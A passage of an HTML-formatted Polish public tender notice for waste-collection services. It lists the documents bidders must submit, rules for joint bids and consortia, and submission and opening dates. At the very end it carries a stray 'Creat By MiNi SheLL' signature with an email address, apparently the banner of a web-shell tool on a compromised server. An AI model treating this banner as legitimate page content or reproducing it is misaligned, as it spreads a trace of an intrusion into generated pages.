aktualne na dzień złożenia w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o<br/>braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej według załącznika nr 9<br/>do SWZ;<br/>b) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego według załącznika nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych oraz<br/>oświadczeń, potwierdzających okoliczności, o których mowa w art. 125 ust.1 ustawy Pzp:<br/>w zakresie spełniania warunków udziału w postępowaniu:<br/>a)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych oraz wpis do rejestru BDO (bazy danych o odpadach) zezwalający na transport odpadów, <br/>w celu potwierdzenia, że Wykonawca posiada kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, związanej z realizacją przedmiotu zamówienia;<br/>b)	dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną na kwotę min. 200 000,00 zł, w celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;<br/>c)	w celu potwierdzenia, że Wykonawca posiada zdolności techniczne i zawodowe Wykonawca przedstawi następujące dokumenty:<br/> wykaz usług zrealizowanych lub aktualnie realizowanych przez min. 8 miesięcy <br/>w ramach jednej umowy co najmniej jedno zamówienie dotyczące wywozu odpadów w ilości min. 150 Mg rocznie (dla zadania nr 1) w zakresie zgodnym lub szerszym od zakresu przedmiotowego zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane (zgodnie z załącznikiem nr 8 do SWZ), oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli <br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż <br/>3 miesiące przed upływem terminu składania ofert;<br/> Wykaz sprzętu niezbędnego do realizacji zadania dostępnego wykonawcy w celu wykonania zamówienia publicznego wraz informacją o podstawie do dysponowania tymi zasobami (zgodnie z załącznikiem nr 7 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych w niniejszym postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W odpowiedzi na ogłoszenie o zamówieniu Wykonawca w terminie wyznaczonym na<br/>składanie ofert wraz z ofertą sporządzoną na Formularzu oferty (wypełniony i podpisany<br/>formularz ofertowy) – stanowiącym Załącznik nr 1 do SWZ, jest zobowiązany złożyć za<br/>pośrednictwem systemu miniPortal niżej wymienione wypełnione dokumenty:<br/>1) Aktualne na dzień składania ofert Oświadczenie Wykonawcy składane na podstawie<br/>art. 125 ust. 1 ustawy o niepodleganiu wykluczeniu (dotyczące przesłanek wykluczenia<br/>z postępowania wymienionych w Rozdziale V SWZ) oraz spełnianiu warunków udziału<br/>w postępowaniu – według wzoru stanowiącego załączniku nr 4 do SWZ, w zakresie wskazanym<br/>przez Zamawiającego.<br/>Informacje zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>Oświadczenie składają odrębnie:<br/>- wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>w takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu;<br/>- podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu (Wykonawca, który korzysta z potencjału podmiotu trzeciego<br/>przedstawia wraz z własnym oświadczeniem wstępnym dodatkowo oświadczenie podmiotu<br/>udostępniającego zasoby). W takim przypadku oświadczenie potwierdza brak podstaw<br/>wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby;<br/>2) Pełnomocnictwo lub inny dokument (jeśli dotyczy) potwierdzający umocowanie do<br/>reprezentowania Wykonawcy ubiegającego się o udzielenie zamówienia publicznego lub<br/>podmiotu udostępniającego zasoby. Gdy umocowanie osoby składającej ofertę nie wynika z<br/>dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika,<br/>powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowa o<br/>współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo<br/>powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3) Zobowiązanie podmiotu trzeciego – omówiono szczegółowo w rozdziale XI SWZ – wzór<br/>oświadczenia stanowi załącznik nr 6 do SWZ (jeśli dotyczy). Składane w przypadku gdy<br/>Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do<br/>podpisania danego zobowiązania nie wynika z dokumentów.<br/>4) Dowód wniesienia wadium – forma i sposób wniesienia wadium omówiono w rozdziale XIV<br/>SWZ - jeśli dotyczy.<br/>5) Wykaz rozwiązań równoważnych – jeśli dotyczy.<br/>6) Zastrzeżenie tajemnicy przedsiębiorstwa –omówione w rozdziale XV SWZ - jeśli dotyczy.<br/>7) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>w zakresie, o którym mowa w art. 117 ust. 4 ustawy Pzp (oświadczenie, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy) - wzór oświadczenia<br/>stanowi załącznik nr 5 do SWZ . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy stosownie do treści art. 58 ust. 1 ustawy Pzp mogą wspólnie ubiegać się<br/>o udzielenie niniejszego zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobligowani są do ustanowienia<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego lub<br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających<br/>się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do<br/>składania oświadczeń woli wymienione we właściwym rejestrze oraz winno być dołączone do<br/>oferty.<br/>3. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu, natomiast spełnienie warunków udziału w postępowaniu<br/>Wykonawcy wykazują łącznie.<br/>4. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z<br/>pełnomocnikiem Wykonawców.<br/>5. Zamawiający nie wymaga od wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku o<br/>dopuszczenie do udziału w postępowaniu.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za prawidłową realizację zamówienia. Wspólnicy spółki cywilnej/uczestnicy<br/>konsorcjum są traktowani jak Wykonawcy składający ofertę wspólną.<br/>7. Zamawiający nie określił odmiennych wymagań związanych z realizacją zamówienia<br/>w odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w inny<br/>sposób niż w odniesieniu do pojedynczych wykonawców.<br/>8. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie<br/>wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>przedłożenia kopii umowy regulującej współpracę tych Wykonawców, umowę<br/>konsorcjum/umowę spółki cywilnej przy czym termin, na jaki została zawarta umowa, nie może<br/>być krótszy niż termin realizacji zamówienia.<br/>9. W przypadku złożenia oferty przez konsorcjum należy wymienić firmy wchodzące w jego<br/>skład oraz wskazać Lidera Konsorcjum.<br/>10. Przedsiębiorców prowadzących działalność w formie spółki cywilnej należy traktować jak<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączą odpowiednio do oferty oświadczenie,<br/>stanowiące załącznik nr 5 do SWZ, z którego wynikać będzie, które usługi wykonają<br/>poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w załączniku nr 3 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-10 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">system miniPortal pod adresem: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-10 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com